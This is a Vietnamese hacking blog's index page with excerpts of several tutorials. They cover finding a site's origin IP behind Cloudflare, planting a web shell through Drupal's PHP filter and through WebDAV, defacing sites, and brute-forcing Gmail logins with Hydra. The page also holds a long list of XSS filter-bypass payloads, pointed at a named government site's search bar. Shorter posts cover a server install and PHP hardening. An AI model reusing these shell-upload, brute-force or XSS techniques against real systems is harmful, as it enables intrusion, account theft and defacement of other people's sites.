DEMO@2025
Welcome To Hồ Đức Dũng' Blog - I'm Not A Hacker!
Blog được tạo ra nhằm mục đích demo các kỹ thuật hack website dưới dạng Tut- và 1 số vấn đề liên quan đến Hacking Tạo một sân chơi lành mạnh và không gian học tập & trao đổi dành cho các bạn có niềm đam mê Hacking và Security. Tác giả không khuyến cáo bạn đọc sử dụng những kỹ thuật này để thâm nhập bất hợp pháp vào các hệ thông, đánh sập các website Việt cũng như không chịu bất kỳ trách nhiệm gì trước mọi hành vi mang tính chất phá hoại của độc giả!
Thứ Hai, 11 tháng 8, 2025
Thứ Ba, 26 tháng 8, 2014
Check DDOS Website
Bài viết chỉ mang tính chất kiểm tra hệ thống firewall chống ddos và tình hình cơ sở hạ tầng mạng của các website Việt Nam hiện nay, Không mang bất kỳ tính chất tấn công hay phá hoại nào vào đối tượng liệt kê ở dưới.
Những website demo dưới đây là nhưng site lớn có hệ thống hạ tầng chống ddos thuộc TOP ở VN hiện nay, tuy nhiên vẫn chưa đủ mạnh và đủ tốt để có thể chống đỡ vấn nạn ddos hiện nay.
Thứ Bảy, 5 tháng 4, 2014
Cài đặt Direct admin, Kloxo, Cpanel lên máy chủ Linux
1. Cài đặt Direct admin
- Đăng nhập ssh với quyền root
- Update yum để cập nhật các package mới nhất
# yum -y update- Cài đặt các package hỗ trợ cài đặt DA
# yum -y install nano gcc gcc-c++ mailx quota fiex wget make perl- Cài đặt Directadmin
# wget http://www.directadmin.com/setup.sh
# chmod 755 setup.sh
# ./setup.sh
Sau đó quá trình cài đặt sẽ được chạy, nếu có các câu hỏi lựa chọn yes hoặc no thì cứ ấn “y” để đồng ý tiếp tục cài đặt
Trong quá trình cài đặt sẽ yêu cầu các thông số: Client ID, Licence ID, Hostname (FQDN) của máy chủ. Nếu bạn đã đăng ký bản quyền Directadmin, MANGSIEUTOC sẽ cung cấp cho bạn đủ các thông số trên để bạn có thể nhập vào trong quá trình cài đặt này.
Thứ Ba, 25 tháng 3, 2014
Các Phương Pháp Bypass Cloudflare Toàn Tập
Qua đây, MANGSIEUTOC xin giới thiệu giải pháp tốt nhất cho các doanh nghiệp, tổ chức bị DDOS hiện nay là sử dụng dịch vụ Hosting, VPS chống DDOS Hosting chống DDOS & VPS chống DDOS
Cách 1: Sử dụng
phương pháp PING Sub Domain
Hoặc có thể sử dụng 1 số công cụ online để check như:
- Ping direct-connect.mangsieutoc.com.vn
- Ping direct.mangsieutoc.com.vn
- Ping fpt.mangsieutoc.com.vn
- Ping cpanel.mangsieutoc.com.vn
- Ping mail.mangsieutoc.com.vn
- Ping webmail.mangsieutoc.com.vn
......
Cách 2: Sử dụng
Netcraft toolbar
Thứ Hai, 10 tháng 3, 2014
Cấu hình chống Local attack
- Bật chức năng safe_mode: vi /usr/local/lib/php.ini
Tìm dòng safe_mode sau đó đổi off thành on. Sau khi đã đổi safe_mode từ off sang on thì chức năng run command ( chức năng thực thi các câu lệnh ) ở trên shell cũng không hoạt động nữa.
Thứ Bảy, 2 tháng 11, 2013
Kỹ Thuật Upshell Đối Với Drupal
Bước 1: Thiết lập mặc
định PHP code
Login với tài khoản admin và vào theo mục sau: Admin -> Administer -> Site
configuration
Tích vào PHP code
-> Set default format
Bước 2: Chèn Shell
vào nôi dung văn bản
Vào theo mục sau: Admin -> Create content . Sau có chọn 1
mục bất kỳ và chèn nội dung code shell vào phần nội dung văn bản “Body”. Sau đó lưu lại.
[TUT] Crack Password Gmail Bang Backtrack 5
Bước
1: Mở chương trình Bruite force Hydra-gtk trong Backtrack
Backtrack -> privilege Escalation -> Password Attacks -> Online Attacks -> Hydra-gtk.
Bước 2: Cấu Hình cho Email
Single target: smtp.gmail.com
Port: 465
Protocol: smtp
Chọn: Use SSL, show attempts and be verbose
Thứ Năm, 14 tháng 3, 2013
Ebooks Hacking Chọn Lọc
Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ.
1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng
viêtk
Tài liệu này được viết bởi cutynhangheo - Admin HCE theo kiểu biên dịch lại từ Ebook
tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack
nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.
2 – Tấn công và bảo vệ
hệ thống
Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo
mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết
rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay
quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet –
Trojan-Backdoor, Gmail Hacking, Website Hacking ...
3 – Elite Collection
HVA
Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các
các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản
xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry,
How to be a Hacker...
4 – Ghi Nhớ Ubuntu
Ebook ghi nhớ các
lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu,
tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.
5 - The Hacker's Underground Handbook
Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay
quanh hacking như : programming, linux, password, Network Hacking, Wireless
Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết
– Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm
dolla.
Thứ Ba, 12 tháng 3, 2013
[Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS
Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS
7. Kỹ Thuật Bypass
1
số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ
đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:
"><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
<ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
Trong đó: 67, 104, 101, 99, 107,
32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By
Soleil” ở dạng char.
Ví dụ:
-
Attacker có thể chèn vào thanh tìm kiếm
site http://www.hanoi.gov.vn đoạn
mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.
Chủ Nhật, 10 tháng 3, 2013
[TUT] Upshell Và Deface Sử Dụng Webdav
Tool:
Tool scan thấy có dính mã độc. Khuyến cáo ae nên sử dụng
trên máy ảo
Pass dải nén: vhb
Bước 1: Vào Tab webDav và chọn ASP Shell Maker